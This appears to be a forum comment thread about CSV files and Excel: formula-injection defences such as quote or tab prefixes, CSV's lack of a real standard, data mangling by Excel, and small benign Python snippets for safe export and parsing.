> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found only one (undocumented) thing that works with any sort of reliability: For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.
> Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.
The documented way is prefixing with a ' character. It doesn't have the length issue either.
As to the root issue, I can't think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don't. At some point, something is going to have to guess.
> The documented way is prefixing with a ' character. It doesn't have the length issue either.
It is suggested in comments, but the author answered
> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV exporter doesn't write the ', so if the user saves the ‘safe’ file and then loads it again all the problems are back.
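For what it's worth, the defensive-export side of this is small enough to show. Here is a minimal sketch in Python (the csv module is standard; the output file name and sample rows are invented for illustration) that prefixes any cell starting with a formula-triggering character with a single quote before writing. As noted above, the prefix won't survive a round trip through Excel's own CSV exporter, so it only protects the file you generate:

    import csv

    FORMULA_TRIGGERS = ("=", "+", "-", "@")

    def defang(value):
        # Prefix anything a spreadsheet might treat as a formula with a single quote.
        text = str(value)
        return "'" + text if text.startswith(FORMULA_TRIGGERS) else text

    def write_safe_csv(path, rows):
        with open(path, "w", newline="", encoding="utf-8") as fh:
            writer = csv.writer(fh)
            for row in rows:
                writer.writerow([defang(cell) for cell in row])

    # The second cell of the second row would otherwise be treated as a formula.
    write_safe_csv("export.csv", [["name", "comment"], ["bob", "=1+2"]])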
That's it. My pet peeve issue with Excel/CSV is USA zip codes. Excel will happily eat leading zeros. There is a specific number format to correct that. If you export that file to CSV with the format set, the CSV file will have 5 digits. If you reopen that CSV file in Excel, it gobbles up the zeros all over again.
As someone mentioned elsewhere, this is an issue with long numbers as well. Excel converts them to scientific notation. Reformat and export, all good. Reopen said file, back to scientific notation.
Really anything that relies on an escape character (') or a specific format gets lost on export to CSV. It exports correctly but there is simply no way to document these formats in a CSV file and have it be compatible with anything but Excel.
Same with phone numbers. In most parts of the world, local numbers (not fully qualified with country code) are written/dialed with a leading zero.
Excel eats these and/or uses scientific notation!
If you use Data -> From Text, and on Step 3 select all the columns and make them "Text", that will prevent Excel from mangling any of the data (stripping leading zeros, evaluating strings starting with = as formula etc.)
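The programmatic equivalent, for anyone ingesting CSVs in code rather than through the wizard, is to force every column to text. A minimal sketch assuming pandas (the file name is made up):

    import pandas as pd

    # Read every column as text so nothing is coerced into numbers or dates:
    # leading zeros (zip codes) and long digit strings (UPCs) survive intact.
    # keep_default_na=False also stops empty fields from becoming NaN.
    df = pd.read_csv("orders.csv", dtype=str, keep_default_na=False)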
Excel somehow has one of the worst CSV parsers I have ever used. You would think this is something that should be bread and butter for a spreadsheet app, but it does a surprisingly terrible job.
Came here to say the same. Also tested it to confirm and the single quote mark inside the double quotes does indeed force interpretation as a string instead of a formula. In both Excel and Google Sheets.
Interestingly, in Excel removing the quotes entirely also causes a formula to be interpreted as a formula and text (even with spaces) as text and numbers as numbers.
In my testing, quotes are only needed when a field contains a comma to prevent it being interpreted as a delimiter.
"transfer a series of values between applications that apply different types to those values and applications that don't"
If we thought about it as an API mechanism, we would parse the strings and apply rules to sanitise or reject it.
Here is a principle for thinking about data. Distinguish internal data structures (persistence, search) from interchange structures (APIs). Codebase A should not be able to directly access the structures of Codebase B. To communicate, they must use explicit APIs.
At the moment, this principle is not mainstream. The CSV loader is not sure if it is loading an interchange format or a persistence format. Another situation that happens regularly: (1) developer builds a database as a storage mechanism. (2) developer decides to have other separate codebases query into that database. Is the database an application data structure (internal) or an API (external)? It is acting as both.
The applications that are communicating either have to agree on the types in advance or they have to use an interchange format that makes it explicit. If your applications don't both know the types in advance then you shouldn't be using CSV.
I think the common model people had of CSV was that it was an imperfect way to transfer values, but safeish from code execution, XSS or "all your Google account data gets exfiltrated" type effects.
Users associate application behaviour with file formats.
Analogy: people think PDF files are safe, but aren't aware of the constant stream of RCE vulnerabilities that is Acrobat Reader & how widely it's used, which invalidates their model of behaviour associated with PDF files.
i don't know why spreadsheet applications don't standardise on a file extension that they won't screw with. call it csf or something. treat it like pure CSV except don't interpret =/@ or any of the other weirdness. basically just interpret all fields as plain strings by default [even if they look like numbers]. this way everything is backwards compatible: old 'weird CSV' files still work, and those that care about their users can use .csf and the files won't endanger their users.
That would make safety an "opt in" measure, it should be "opt out" instead. Make the CSV format stop interpreting formulas unless you specifically ask it to. Most people don't put formulas in their CSV files anyway.
Excel is the source of so many problems. At work, we ask users for an input in CSV or Excel format, and most people see "CSV" and export Excel data as CSV. Which is fine and great, but long numbers - such as UPCs - show up in Excel as scientific notation, being big scary numbers, and also get exported as such.
So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains "1.23456E+11", which is worse than useless.
I used to work in third-party logistics and a big project of mine was an automated file import process, so folks could send us their daily/hourly orders for processing and fulfillment. I'd say roughly 65-70% of the entire code base was error handling and figuring out when to kick out a file for human review and/or outright deny it and contact the customer.
The hardest ones to work with were the mom and pop shops who suddenly had some success on Amazon and came to us after fulfilling out of their garage for a year and a half. Try telling a semi-retired 60 year old electrician in the middle of Iowa that the file he sent is worthless because none of the product codes match what you have, especially when once he closes the file he doesn't have any idea where it is.
A long time ago I did the same work with banks. The effect was the same. It was amazing to me how bank employees could somehow find a way to regularly insert ASCII control characters into a CSV value.
On a consulting project a few years ago, I was brought in to help a Fortune 500 energy company make sense of the value-at-risk model that one guy had built over 20 years in VBA. Most of it was pulling from Excel spreadsheets brokers would send daily with prices. What. A. Nightmare.
It was hard to decide what I hated most about the project. The mind-numbing stupidity of it. The fact that managers had allowed this single point of failure, and then let the guy leave. Or... that it was all a fictitious dance, pursued because spinning off their trading operations would get them millions in tax subsidies.
I was introduced to programming by my father. He's a business analyst of sorts, so naturally he only knows VBA.
After he left his job, some poor soul had to inherit his massive collection of VBA scripts, which more or less automated his day-to-day work. I think he showed the new guy what buttons to press on his spreadsheets, but I can't imagine he understood any of the Excel-fu my father had done. The legacy architecture that is tied to Excel in all sorts of businesses.. it's crazy.
These are the exact problems we're banging our heads against.
The worst part is that it's not something that can be solved with an external dependency on some new startup - that would just add another layer we'd have to go through in the error cases, which would be numerous.
God, I wish I could share some of the files we've received. I cannot conceive what sort of monster would write a data exporter that would produce these unreadable things.
CSV is the source of so many problems. CSV has no character set, no rule for escaping double-quotation marks, commas, and newlines. There's not even a way to look at a CSV file and tell what its "rules" are beyond heuristics, and those only take you so far.
I ask for XLSX files since at least it's structured, unambiguous and documented, but even better: a minimal XLSX parser is trivial (about a page) to write.
Also: Educating users on how to specify the character set in every application that the user seems to want to use is a special kind of hell.
I'd say that the spreadsheet model is long in the tooth, but there has been a failure of will in the industry to kill it.
People use Excel when they should really use a database; they use it because they want to format something on a 2-d grid, edit tabular data, make plots, do calculations, make projections, etc.
The problems go down to the data structures in use.
For instance there is nothing 2-dimensional about financial reports (and projections), really financial reports are hyperdimensional. Proper handling of dates and times is absolutely critical. Also the use of floating point with a binary exponent is a huge distraction in any kind of math tools aimed at ordinary people. (Mainframes got that right in the 1960s!)
Google Sheets is just a stripped down version of Excel and other than the ability for multiple people to work on it simultaneously, is really no better.
It's always fun to look down on the likes of Excel and PHP etc. Of course, we should try to learn, too.
Excel for all its faults is easy for beginners to pick up. Semi-technical people can quickly hack together a bug-ridden prototype of their ideas. In most companies the alternative is not well-written software, but spending countless meetings to get IT to spend millions to provide a bug-ridden prototype in a few years time.
One of the main problems with Excel as I can see it is that it is effectively a write-only language. Auditing an Excel sheet is famously almost impossible. And that's before you add VBA in the mix.
Since I mentioned PHP: one of the best things I can say about the language and its ecosystem is that they made it really easy to add a 'web-counter' to your otherwise late 90s static html-only page on shared hosting. You begin with a web-counter, and then just keep on copy-and-pasting.. Haskell is not nearly that easy to pick up, even if you are prepared to do it badly.
So true. At my wife's accounting firm they recently moved from excel to Postgres. Accountants now interact with the database directly rather than messing with the mess that is excel and everyone is better for it.
That's not at all helpful unless the document comes with a statement that it complies with RFC4180. His point wasn't that there are no standards for doing so, more that there are so many standards for doing so, and it's near impossible to determine which standard a document uses by itself.
RFC 4180 just tried to write down what the most common quirks of CSVs were in the wild at the time. It's a reference more than a specification.
It's really a missed opportunity. Had they had the balls to actually specify CSV properly this wouldn't be nearly as much of a problem. This would have probably left a lot of the existing CSV writers non-conformant, but it would have likely improved the future situation considerably.
It doesn't even need to be complex. Just a few rules:
1. Reserved characters are , " \
2. If a reserved character appears in a field, escape it with \
3. Alternatively you can double quote a field, in which case you only need to escape " characters in the field
4. Line endings are either CR, CR/LF, or LF. Parsers must support all line endings.
5. Character set is UTF-8, however the " , and \ characters must be 0x22, 0x2C, and 0x5C. Alternative language lookalike characters will not be treated as control characters.
6. Whitespace adjacent to a comma is ignored by the parser
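To make the proposal concrete, here is a rough sketch in Python of an encoder for those rules (the rules above are this comment's proposal, not an existing standard; embedded newlines are not covered by them, so they aren't handled here either):

    def escape_field(value):
        # Rule 2: backslash-escape each reserved character. Escape the backslash
        # first so the backslashes we add are not escaped again.
        for ch in ("\\", ",", '"'):
            value = value.replace(ch, "\\" + ch)
        return value

    def quote_field(value):
        # Rule 3: wrap in double quotes; only the quote character needs escaping.
        return '"' + value.replace('"', '\\"') + '"'

    def encode_row(fields):
        return ",".join(escape_field(f) for f in fields) + "\n"

    print(encode_row(["plain", "has, comma", 'has "quotes"']), end="")
    # plain,has\, comma,has \"quotes\"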
RFC4180 is worse than worthless; do not implement it and claim you support "CSV files". Almost every paragraph is useless, wrong, or dangerous; its few citations offer conflicting and sometimes clearly-stupid advice where they advise the use of CSV at all. Some examples:
§ 2.1 says that lines end in CRLF. This is in opposition to every UNIX-based system out there (which outnumber systems that use CRLF as a line delimiter by between 2:1 and 8:1 depending on how you choose to estimate this) and means that CSV files either don't exist on Mac OS X or Linux, or aren't "text files" by the standard definition of that term -- both absolutely silly conclusions! Nevertheless, following RFC4180-logic, § 2.6 thus suggests that a bare line-feed can appear unquoted.
§ 2.3 says the header is optional and that a client knows if it is present because the MIME type says "text/csv; header"; then § 3 admits that this isn't very helpful and clients will have to "make their own decision" anyway.
§ 2.7 requires Fortran-style doubling of double-quote marks, like COBOL and SQL, and ignores that many "CSV" systems use backslash to escape quotes.
§ 3 says that the character set is in the mime type. Operating systems which don't use MIME types for their file system (i.e. almost all of them) thus cannot support any character set other than "US-ASCII".
None of these "suggestions" are true of any operating system I'm aware of, nor are they true of any popular CSV consumer; If a conforming implementation of RFC4180 exists, it's definitely not useful. In fact, one of the citations (ESR) says:
The bad results of proliferating special cases are twofold. First, the complexity of the parser (and its vulnerability to bugs) is increased. Second, because the format rules are complex and underspecified, different implementations diverge in their handling of edge cases. Sometimes continuation lines are supported, by starting the last field of the line with an unterminated double quote — but only in some products! Microsoft has incompatible versions of CSV files between its own applications, and in some cases between different versions of the same application (Excel being the obvious example here).
A better spec would be honest about these special cases. A "good" implementation of CSV:
• needs a flag or switch indicating whether there is a header or not
• needs to be explicitly told the character set
• needs a flag to specify the escaping method \ or ""
• needs the line-ending specified (CR, LF, CRLF, [\r\n]{1,}, or \r{0,}\n{1,})
... and it needs all of these flags and switches "user-accessible". RFC4180 doesn't mention any of this, and so anyone who picks it up looking for guidance is going to be deluded into thinking that there are rules for "escaping double quotes" or "commas" or "newlines" that will help them consume and produce CSV files. Anyone writing specifications for developers who tries to use RFC4180 for guidance to implement the "import CSV files" feature is going to be left to dry.
The devil has demanded I support CSV, so the advice I can give to anyone who has received a similar requirement:
• parse using a state machine (and not by recursive splitting or a regex-with-backtracking).
• use heuristics to "guess" the delimiter by observing that a file is likely rectangular -- tricky, since some implementations don't include trailing delimiters if the trailing values in a row are missing. I use a bag of delimiters (, ; and tab) and choose the one that produces the most columns, but has no rows with more columns than the first.
• use heuristics to "guess" the character set especially if the import might have come from Windows. For web applications I use header-hints to guess the operating system and language settings to adjust my weights.
• use heuristics to "guess" the line-ending method. I normally use whatever the first-line ends in unless [\r\n]{1,} produces a better rectangle and no subsequent lines extend beyond the first one.
A successful and fast implementation of all of these tricks is a challenge for any programmer. If you guess first, then let the user guide changes with switches, your users will be happiest, but this is very relative: Users think parsing CSV is "easy" so they're sure to complain about any issues. I have saved per-user coefficients for my heuristic guesses to try and make users happier. I have wasted more time on CSV than I have any other file format.
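As an illustration of the delimiter-guessing step described above, a minimal sketch in Python (it ignores quoting entirely, so it is only a first guess to confirm with the user; the file name is invented):

    def guess_delimiter(lines, candidates=(",", ";", "\t")):
        # Pick the candidate giving the most columns on the first line, provided
        # no later line splits into more columns than the first.
        best, best_cols = ",", 1
        for delim in candidates:
            first_cols = lines[0].count(delim) + 1
            if first_cols <= best_cols:
                continue
            if all(line.count(delim) + 1 <= first_cols for line in lines[1:] if line):
                best, best_cols = delim, first_cols
        return best

    with open("mystery.csv", encoding="utf-8", errors="replace") as fh:
        sample = fh.read().splitlines()[:100]
    print(guess_delimiter(sample))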
My advice is that we should ignore RFC4180 completely and, given the choice, avoid CSV files for any real work. XLSX is unambiguous and easy enough that a useful implementation takes less space than my criticism of CSV does, and weirdly enough, many uses of "CSV" are just "I want to get my data out of Excel" anyway.
To me the issue isn't how we should read in CSV (as you stated, we should use a different format that is less ambiguous) but rather getting vendors to provide the data in that new format. I've found that most vendors I work with are using a cobbled-together solution built on top of a mainframe, and getting them to add/remove a field from CSV is a monumental task; there is no way they will move to a different format like XLSX or JSON or XML. Until there is an open, industry-wide standard, I just don't see CSV going away.
None? You seem to have touched mostly on consuming CSV and safe ways to do that, and suggested XLSX. I'm just adding that digesting CSV safely isn't our biggest issue; it's getting vendors to use something other than CSV, and unfortunately that is typically out of most people's control.
I've used several different characters for escaping, though I don't know why backslash (\) isn't the default universal one. It seems pretty sensible, it's used across multiple scripting languages and CLIs. If you need to escape a backslash, you escape it with a backslash.
The comma-separated-value file almost certainly comes from list-directed I/O in Fortran, which used doubling of quote characters to "escape" them. This was probably an IBM-thing since other IBM-popularised languages also do this (including SQL and COBOL). As someone else pointed out, RFC4180's own interpretation of "csv" also does this.
My guess is that they did this because parsing and encoding was simple (only a few instructions) on these systems and required no extra memory.
You mean does Google Sheets suffer from the same vulnerabilities? IMPORTXML is a Google Sheets function and isn't in Excel.
My php-based xlsx parser is about 100 lines. If you don't need time series you can save almost twenty lines. Strings cost about ten lines. Even still, whilst it may not support every string-type or every time format, it is more reliable than any CSV parser...
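For anyone curious what such a minimal parser looks like, here is a rough sketch in Python rather than PHP (not the parent's code). It assumes the conventional xl/worksheets/sheet1.xml and xl/sharedStrings.xml layout, reads only cached cell values and shared strings, ignores dates, styles, and column gaps, and the file name is made up:

    import zipfile
    import xml.etree.ElementTree as ET

    NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"

    def read_xlsx(path):
        with zipfile.ZipFile(path) as zf:
            shared = []
            if "xl/sharedStrings.xml" in zf.namelist():
                sst = ET.fromstring(zf.read("xl/sharedStrings.xml"))
                shared = ["".join(t.text or "" for t in si.iter(NS + "t"))
                          for si in sst.iter(NS + "si")]
            sheet = ET.fromstring(zf.read("xl/worksheets/sheet1.xml"))
            rows = []
            for row in sheet.iter(NS + "row"):
                cells = []
                for c in row.iter(NS + "c"):
                    v = c.find(NS + "v")
                    text = v.text if v is not None else ""
                    if c.get("t") == "s":      # shared-string cell: <v> is an index
                        text = shared[int(text)]
                    cells.append(text)
                rows.append(cells)
            return rows

    for row in read_xlsx("report.xlsx"):
        print(row)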
If you are opening up the resulting file in Excel, yes. If you are writing your own minimal XLSX parser like geocar says he has, probably not. It's unlikely that your own parser is going to implement the functionality to go send an arbitrary AJAX request.
Export side you obviously can't control :( But on import, if you use Data -> From Text, and on Step 3 select all the columns and make them "Text", that will prevent Excel from mangling any of the data (stripping leading zeros, evaluating strings starting with = as formula etc.)
Really quite rich people relying on Excel for economic world-scale critical stuff has ruined/cost more than a few lives. Do you blame Bill for his shitty software or do you blame the rich corporate types for not giving a shit/incompetent minimum effort IT?
The thing that puzzles me the most is that people use _C_SV at all. Separation by comma, or any other member of the printable subset of ASCII, in the first place. What this essentially boils down to is ambiguous in-band signalling and a contextual grammar.
ASCII had addressed the problem of separating entries ever since its creation: Separator control codes. There are:
x01 SOH "Start of Heading"
x02 STX "Start of Text"
x03 ETX "End of Text"
x04 EOT "End of Transmission"
x1C FS "File Separator"
x1D GS "Group Separator"
x1E RS "Record Separator"
x1F US "Unit Separator"
You can use those just fine for exchanging data as you would using CSV, but without the ambiguities of separation characters and the need to quote strings. Heck if payload data is limited to the subset ASCII/UTF-8 without control codes you can just dump anything without the need for escaping or quoting.
So my suggestion is simple. Don't use CSV or "P"SV (printable separated values). Use ASV (ASCII separated values).
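A sketch of what ASV reading and writing looks like in Python, assuming (as the parent says) that the payload itself contains no control codes, so no quoting or escaping is needed:

    UNIT_SEP = "\x1f"    # US: separates fields within a record
    RECORD_SEP = "\x1e"  # RS: separates records

    def dump_asv(rows):
        return RECORD_SEP.join(UNIT_SEP.join(fields) for fields in rows)

    def load_asv(text):
        return [record.split(UNIT_SEP) for record in text.split(RECORD_SEP) if record]

    data = [["name", "note"], ["bob", 'has, commas and "quotes" and\nnewlines']]
    assert load_asv(dump_asv(data)) == data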
This comes up every single time someone mentions CSV. Without fail. The bottom line is that CSV is human readable and writable in plain text. If you start using fancy ASCII characters, then it becomes neither because our text editors don't support it.
Let's send patches to text editors so they render fancy ASCII characters? I also find it amusing that "fancy ASCII characters" is even a statement that can make sense; there are only 128 ASCII characters!
Sure. Send patches. Until it becomes easy to read and write fancy ASCII characters in text editors, my criticism stands.
I predict this will never happen under the principle of "good enough to use, bad enough to complain on HN." My point is that people keep suggesting ASCII delimiters as if it's some obvious solution that solves the entire problem, but it doesn't. People should instead be suggesting that text editors better support ASCII delimiters so that we can use them roughly as easily as we use commas today.
Explain to me why humans have to be the ones to write proper syntax and escaping, instead of their editors. Do you do this for other formats, like RTF? What is this obsession with hand-coding complicated formats :)
No, but I do it for formats like HTML, CSS, JSON. My editor can assist me, but I don't need it. To a lesser degree, the same is true of Java, though I do admit to leaning much more heavily on my IDE for that.
> What is this obsession with hand-coding complicated formats :)
Well, part of it is that they're not all that complicated unless you're doing something fancy. Another part is almost certainly our (we as in developers) pride in being able to use nothing but vi installed on a decade-old operating system to get things done.
Why? What benefit do you get from coding it by hand? The only one I can think of is being able to type some esoteric incantations in a textbox.
Downsides include:
XSS and malicious injection - users should be using markdown or provided an actual contentEditable HTML editor instead of a textarea. Like in GMail.
Syntax errors. How many times have you typed some JSON by hand and realized you forgot to balance some braces or add a comma, or remove a comma at the end of an object?
Complexity: not that complicated, really? Basic C, HTML, and CSS are not complicated. Advanced stuff is complicated. Forgetting a brace or a semicolon torpedoes the whole document. SQL is not complicated. Does that mean you want to write SQL by hand for production code?
Why don't you install a simple extension to vi, like an HTML format adapter? I'm a developer too. But let me tell you what it sounds like when you say you want to use nothing but vi: it's like saying you want to be able to build robots using nothing but a hammer and some nails, refusing anything that requires further abstraction or advancement beyond what you can do with a hammer.
And also keep in mind that not everyone is a developer. The fact that you like to keep esoteric syntax rules in your head for HTML, XML, CSS, Javascript, C++ and so on doesn't mean EVERYONE should have to. When it comes to CSV, it's not even a real standard. You have to keep in your head all the cross-platform quirks, like \r\n garbage, similar to how web developers need to keep in their head all the browser quirks and workarounds.
All this... for some pride thing of being able to write text based stuff by hand.
I brought up RTF for a reason. No sane person should want to type .rtf or .docx by hand. So why HTML?
CSV is complicated in the same way the DOM and Javascript is complicated:
1) there are so many differences between browsers that you have to keep them all in mind when asking people to send you csv files, or generating them, etc. Such as for example \n vs \r vs \r\n and escaping them.
2) You have to keep in your head escape rules and exceptions, and balancing quotes and other delimiters.
3) The whole thing doesn't look human readable or easily navigable for a document of any serious complexity.
And what's the upside? If more people just used Excel or another spreadsheet program to edit these files, you won't face ANY of these issues. They would eventually converge on a standard format, like they did with HTML.
> there are so many differences between browsers that you have to keep them all in mind
Compatibility horrors from people violating the standard will appear no matter what format you use. That's not fair to blame on the format.
> You have to keep in your head escape rules and exceptions, and balancing quotes and other delimiters.
CSV itself has newlines, commas, and quotations marks for special characters. That's extremely minimal. The only extra thing to keep in your head is "is this field quoted or not".
What set of escapes and delimiters could be simpler? Would you rather reserve certain characters, and abandon the idea of holding "just text" values?
> The whole thing doesn't look human readable or easily navigable for a document of any serious complexity.
> And what's the upside? If more people just used Excel or another spreadsheet program to edit these files, you won't face ANY of these issues. They would eventually converge on a standard format, like they did with HTML.
This sounds like you're arguing for a more complex format! I'm confused.
> What set of escapes and delimiters could be simpler? Would you rather reserve certain characters, and abandon the idea of holding "just text" values?
I can no longer remember where I saw it (I thought it was Lua), but I heard the idea to use =[[ ... ]]= and =[[[ ... ]]]= as wrappers (a bit like the qq operator from Perl). They can be nested and don't interfere, so =[[[ abc =[[ ]]= ]]]= is a legitimate string.
Except when the compatibility horror comes from Excel violating the standard, but only if you happen to be located in the wrong hemisphere (hello semicolons). So, even if everyone just used Excel, you would still face this issue. Now what?
I am not arguing for another format. I am arguing for using a program to edit these files, to avoid syntax errors and other crap that arises when people do manual stuff that doesn't need to be done manually. And sure the format can stand to be slightly more complex, who cares if you're not editing it by hand.
ASCII text format is simple.
Anything where you have arbitrarily complex structure, why not use a program to edit it? What is the downside of using the right tool for the job? Your text editor is a program. Why tunnel through text and manually edit stuff?
Does any system (modern or not) actually use `\r` for anything? Because I'm not aware of it being used alone. I'm not even sure why software today still differentiates between the two instead of treating any of `\r`, `\n`, `\r\n` as a single line break. I can maybe see it being useful eg in word processor to differentiate manual line break from paragraph break, but that's not a plain text format; in the vast majority of cases, treating them as the same character in parsers shouldn't* cause any issues.
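A tiny illustration of that "treat them all the same" approach (this is roughly what Python's universal-newline mode and str.splitlines() already do):

    import re

    def split_lines(text):
        # \r\n must come first in the alternation so it isn't split twice.
        return re.split(r"\r\n|\r|\n", text)

    assert split_lines("a\r\nb\rc\nd") == ["a", "b", "c", "d"]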
Honestly I dispute that it is "human readable". It is sort of legible but incredibly inconvenient to read or manually write. They might be slightly more convenient than tabular files such as ACH or DDF
Consistent? What do you mean, "consistent"? Sometimes it's comma separated, sometimes it's semicolon separated (depending on the user's locale), sometimes it's separated by tabs (because it's a _C_SV file, yeah, no biggie), no content encoding hint (Unicode? Latin-1251? Win-1252? Nobody knows), not to mention you've written this comment under an article that shows just about the least consistent behavior ever. (Line breaks? Ahahahaha!)
The only consistent thing about CSV is its ubiquity; other than that, it's a hairy, inconsistent mess that appears simple. (Source: having parsed millions of blobs that all identified themselves as CSV, despite being almost completely different in structure.)
You would think so, but people are dumb. I've seen tab-delimited files that are .CSV instead of .tsv, and I've also seen the semicolon delimiter a few times though I can't recall where. I think Excel actually pops up a prompt when importing to confirm the delimiter in some cases?
From your link, it's quite clear that you should not assume any particular CSV file to follow any particular rules.
> Interoperability considerations:
> Due to lack of a single specification, there are considerable differences among implementations. Implementors should "be conservative in what you do, be liberal in what you accept from others" (RFC 793 [8]) when processing CSV files. An attempt at a common definition can be found in Section 2....
> Published specification:
> While numerous private specifications exist for various programs and systems, there is no single "master" specification for this format. An attempt at a common definition can be found in Section 2.
Section 2 states:
> This section documents the format that seems to be followed by most implementations:
"All theory, dear friend, is gray, but the golden tree of life springs ever green." -Goethe
If CSV were indeed always comma-separated, my hair would be at least 5% less gray. Alas, most programs emit semicolon-separated "CSV" in some locales (MS Office, LibreOffice, you-name-it-they-got-it).
Of course, I understand that your academic position "if it chokes the RFC-compliant parser, it's not a True CSV and should be sent to /dev/null" tautologically exists - but for some reason, users tend to object to such treatment (especially when they have no useful tools that would emit your One True Format for them).
TL;DR: there is no single standard fitting all the things that call themselves "CSV".
In other words, as soon as you start exchanging data, you'll get something that is complex, broken, or (most common case) both. Existence of a simple, consistent general format has not been conclusively proven impossible, but I have yet to see one in practice.
(Of course, everybody and their dog have cooked up simple data schemes, yes, but those are a) domain-specific, and b) not in widespread use.)
The article kind of addresses this. There are millions of spreadsheets and applications out in the wild that use CSV to communicate.
Sure, if you're building some kind of system where you need to ingest data from one application from another application you control, then using a different interchange format like ASV is an option. But then people tend to use more powerful formats like JSON or XML.
> There are millions of spreadsheets and applications out in the wild that use CSV to communicate.
That, and data in CSV format is human readable in any old text editor or even word processor, which many use as a quick sanity check to make sure their data looks sane. A lot of editors will not display the ASCII control characters at all, so the fields on the line get mashed together, or may even reject the file as containing what it considers to be unexpected characters.
More to the point, it's easy to export from Excel, which is a massive pain to load in any non-.NET language.
While it's great to hope to use a well defined transport for machine-to-machine communication, it's exhausting to explain anything beyond CSV to Bob from sales.
Give me a version of every standard text editor that can let me display and edit these ASV files when I just need to quickly hack something, and sure, I'll use it. CSV is directly editable in any text editor and manipulable by standard text processing tools, that's one of its key advantages.
I cannot remember how often, when I worked in 'enterprise software', we were sent CSV files by companies that were completely broken after someone 'simply edited' them with a 'standard editor'. More than 1000 times for sure over the years.
Worse; most 'non computer people' cannot get them imported into a spreadsheet properly (for whatever reason; usually it just puts everything in one field or column, people curse and give up), so they have to edit them in Notepad or worse, in MS Word and then send them back.
I distinctly remember receiving a .rtf file attachment from a user who was "sending me a CSV" and I had one of those daydream fantasies about tossing the computer out of the window and walking out.
ASCII Name - Vim Insert - Visual Repr
--------------------------------------------------
Start of Heading - Ctrl-v Ctrl-a - ^A
Start of Text - Ctrl-v Ctrl-b - ^B
End of Text - Ctrl-v Ctrl-c - ^C
End of Transmission - Ctrl-v Ctrl-d - ^D
File Separator - Ctrl-v Ctrl-\ - ^\
Group Separator - Ctrl-v Ctrl-] - ^]
For insertion you can also always just Ctrl-v DDD or Ctrl-v xHH where DDD is the three digit decimal value or HH is two hex values of the ascii code.
For some context in case anyone was curious, Wikipedia believes that both vi and Emacs were (originally) written in 1976, which is 41 years ago. Unix dates from ~1969--1973 depending on your definition, which is 44--48 years ago.
Accordingly, the reference to "54 year old" appears to be to the first standard as well as first commercial use of ASCII, in 1963.
That first ASCII standard from 1963 specified eight "separators" simply named S0 through S7 at codes 0x18--0x1F. The 1965 update reused the first four for other purposes (eg cancel and escape) and labeled 0x1C--0x1F with the more descriptive names we now know.
The number of devs who can competently use Vim or Emacs is already on the low side. The number of non-devs that can do it is far lower. The file needs to be editable by _any_ user with a text editor, not just a developer versed in Vim/Emacs.
I know the response will be "they'll just open it in Excel anyway" which is true in most cases, but I frequently have clients that want to download an export, modify it real quick with a text editor (many use Notepad++ for this), and then reupload it. They're usually doing massive find/replaces on the data and then reuploading into the system and a simple text editor is a lot better for this than Excel.
> The number of devs who can competently use Vim or Emacs is already on the low side. The number of non-devs that can do it is far lower. The file needs to be editable by _any_ user with a text editor, not just a developer versed in Vim/Emacs.
Emacs defaults to a menu + toolbar and the arrow/pageup/pagedown/home/end keys are functional. There are buttons with icons and labels for new document, open document, find in document, and copy/cut/paste. It's friendlier to use than something like Notepad++, gedit, or kate out of the box for simple editing. For more complicated stuff, there are menus and extensive documentation. The narrative that emacs is impossible to use for any but the programming elite doesn't fit the default experience.
If you define competently use as can extensively configure beyond the default state, then I'd argue that very few recent developers outside of vim/emacs users have ever done so. How many people have you met who have written C# to extend Visual Studio or some Java to extend Eclipse/IntelliJ? Even with things like Atom, how many of those Atom users are writing Javascript packages versus using the packages someone else wrote?
If you define competently use as "be able to edit and debug in $x language", I'd argue the menu-driven approach in emacs is just as valid as the menu-driven in approach in any other random gui editor. The difference is that emacs can be customized and has decades of documentation and examples to pull from for any conceivable scenario. Want to interact with your editing environment with foot pedals, talk on that fancy new chat interface, interface with a serial port to pull sensor data or control a personal massager? You can find someone who has done it and documented it on emacs.
CS PhD and professional software engineer here. I can edit files very slowly and inefficiently in both vim and emacs but it would be a mess to use them for real work.
Some people never learned either of the editors. So what? The physical act of writing text was never the hard part of software engineering.
I don't think this necessarily addresses the security vulnerabilities in the article, which involve abusing the application reading the CSV, not the file format itself.
If Excel decides that text between Start of Text and End of Text that begins with a "=" is a formula, then you're in the same spot.
I am happy when I see I can get data via CSV over the other delivery methods people use. My local school board prints out all their data and then scans them into a PDF, ugh. I had one vendor that on purpose made the data only available in forms that would take me 600+ lines of code to clean up in mangled ASCII format.
I use CSV all the time when I am working with R. My data can come in the form of CSV, XLS, or PDF. Which would you want to work with?
I can easily look at the data. I never touch my incoming data and my output is in reports, but CSV can be the easiest way to get data into a computer.
Actually, XLS is not bad to work with, if you have a library for it. And it's well defined, unlike CSV. Insofar as I know, there's no way to make a CSV file that will open and show nicely in all popular versions of excel / google docs/ open office, especially across language settings. And a well formed XLS file will just work.
We recently went through an external pentest simulating a hostile actor with inside information. We had 2 weeks to prepare and successfully defended against timing attacks, DDoS attempts, identity spoofs, request modifications, script injections etc. Passed with flying colors... except for CSV/Excel injection. Everyone looked at each other with the sheepish embarrassment of being pwned by a script kiddie. This was a total blind spot indeed, even after we reviewed every other user I/O.
I wrote "script kiddie" as a way to describe the relative complexity of this attack vector - I was highly impressed with the pentest process, and think it's one of the smartest things we did this quarter.
Filtering user inputs is security 101, yet we missed this while focusing on fancy defense mechanics. This large gap between what the engineering team prepared for, and how they were exposed, is what made the outcome "embarrassing" - hence I agreed with GP that CSV/Excel stuff could be a blind spot even for well-trained people.
Generating CSV/Excel extracts, which included the user's first name and feedback comments verbatim - thus creating 2 injection points for malicious formulas.
CSV is hell. Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons (who would have thought files would be shared across country borders!?), so when we open CSV files that are actually comma separated all the information is in the first cell (until a semicolon appears).
To get comma separated CSVs to show properly in Excel we have to mess around with OS language settings. CSV as a format should have died years ago, it's a shame so many apps/services only export CSV files. Many developers (mainly US/UK based) are probably not aware of how much of a headache they inflict on people in other countries by using CSV files.
A CSV importer absolutely needs to be configurable. I've seen delimiters including tabs, vertical bars, tildes, colons, and random control characters (they didn't even choose RS and US).
